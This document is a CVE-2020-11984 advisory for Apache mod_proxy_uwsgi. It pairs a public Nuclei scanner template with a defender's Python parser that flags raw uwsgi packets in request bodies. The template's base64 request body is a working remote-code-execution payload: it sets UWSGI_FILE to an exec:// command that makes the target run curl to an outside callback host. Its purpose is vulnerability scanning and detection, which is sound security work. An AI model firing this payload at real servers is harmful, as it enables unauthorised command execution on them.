Apache HTTP Server 2.4.32 to 2.4.44 contains an information disclosure and possible remote code execution vulnerability in mod_proxy_uwsgi. Remote attackers can access sensitive information and potentially execute arbitrary code; exploitation requires sending crafted requests.
PoC code [public]
id: CVE-2020-11984

info:
  name: Apache HTTP Server - Remote Code Execution
  author: wofeiwo@80sec.com,pszyszkowski,pdresearch,iamnoooob
  severity: critical
  description: |
    Apache HTTP Server 2.4.32 to 2.4.44 contains an info disclosure and possible remote code execution caused by a vulnerability in mod_proxy_uwsgi, letting remote attackers access sensitive information and potentially execute arbitrary code, exploit requires sending crafted requests.
  remediation: |
    Update to >= 2.4.45
  reference:
    - https://github.com/RubenBar/MLW-upcrans/tree/main/1.Exploit
    - https://nvd.nist.gov/vuln/detail/cve-2020-11984
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-11984
    cwe-id: CWE-120
    epss-score: 0.80216
    epss-percentile: 0.99084
  metadata:
    verified: true
    max-request: 1
    vendor: apache
    product: http_server
    shodan-query: cpe:"cpe:2.3:a:apache:http_server"
  tags: cve,cve2020,apache,httpd,rce

variables:
  oast: ".{{interactsh-url}}"
  payload: "{{padding(oast,'a',54,'prefix')}}"

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {{replace(base64_decode('AHIAAAoAVVdTR0lfRklMRUsAZXhlYzovL2N1cmwgYWFhYWFhYWEuZmw0NGhoY240NHEydWtsdjI5YnB6dTR1amxwY2QzM3JzLm9hc3RpZnkuY29tOyBlY2hvICIiCwBTQ1JJUFRfTkFNRQoAL3BlbmV0cmF0ZQ=='),'aaaaaaaa.fl44hhcn44q2uklv29bpzu4ujlpcd33rs.oastify.com',payload)}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "http")'
          - 'contains(interactsh_request, "User-Agent: curl")'
        condition: and
# digest: 4a0a00473045022100f589cbcb345c224cc8cd7775e07cfd3c205e366b6ffcd72cba8c4517eb13b61102202f2d596be1999799f5c94ce7bd146ae1920b9e9773fe1f943f277c2b90d63cef:922c64590222798bb761d5b6d8e72950
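
For detection on the defender's side: the request body in the template above base64-decodes to a raw uwsgi packet, that is, a 4-byte header followed by length-prefixed key/value variables, one of which is UWSGI_FILE. The Python below is an added example, not part of the template or of Apache's code; it parses a logged HTTP request body as such a packet and flags that pattern. The sample bodies, the placeholder value and the function names are constructed for illustration.

```python
import struct

# Constructed samples (not captured traffic): a raw uwsgi packet carrying a
# placeholder UWSGI_FILE value, and an ordinary form body.
SAMPLE_UWSGI = (b"\x00\x35\x00\x00"
                b"\x0a\x00UWSGI_FILE" b"\x14\x00scheme://placeholder"
                b"\x0b\x00SCRIPT_NAME" b"\x04\x00/app")
SAMPLE_FORM = b"username=alice&password=constructed"


def parse_uwsgi_packet(body):
    """Return {key: value} if body starts with a well-formed uwsgi packet
    (modifier1, uint16 LE datasize, modifier2, then uint16-LE-length-prefixed
    key/value pairs filling exactly datasize bytes); otherwise None."""
    if len(body) < 4:
        return None
    _mod1, datasize, _mod2 = struct.unpack_from("<BHB", body, 0)
    if datasize == 0 or 4 + datasize > len(body):
        return None
    data, pos, variables = body[4:4 + datasize], 0, {}
    while pos < len(data):
        pair = []
        for _ in range(2):  # key, then value
            if pos + 2 > len(data):
                return None
            (length,) = struct.unpack_from("<H", data, pos)
            pos += 2
            if pos + length > len(data):
                return None
            pair.append(data[pos:pos + length])
            pos += length
        variables[pair[0]] = pair[1]
    return variables


def inspect_body(body):
    """Findings for one HTTP request body; an empty list means nothing flagged."""
    variables = parse_uwsgi_packet(body)
    if not variables:
        return []
    findings = []
    if any(key.startswith(b"UWSGI_") for key in variables):
        findings.append("raw uwsgi packet with UWSGI_* variables in client body")
    target = variables.get(b"UWSGI_FILE", b"")
    if b"://" in target:
        scheme = target.split(b"://", 1)[0].decode("latin-1")
        findings.append("UWSGI_FILE value uses URI scheme: " + scheme)
    return findings
```

Ordinary ASCII form bodies fail the header check because their second and third bytes decode to a datasize far larger than the body, which keeps false positives low on short requests.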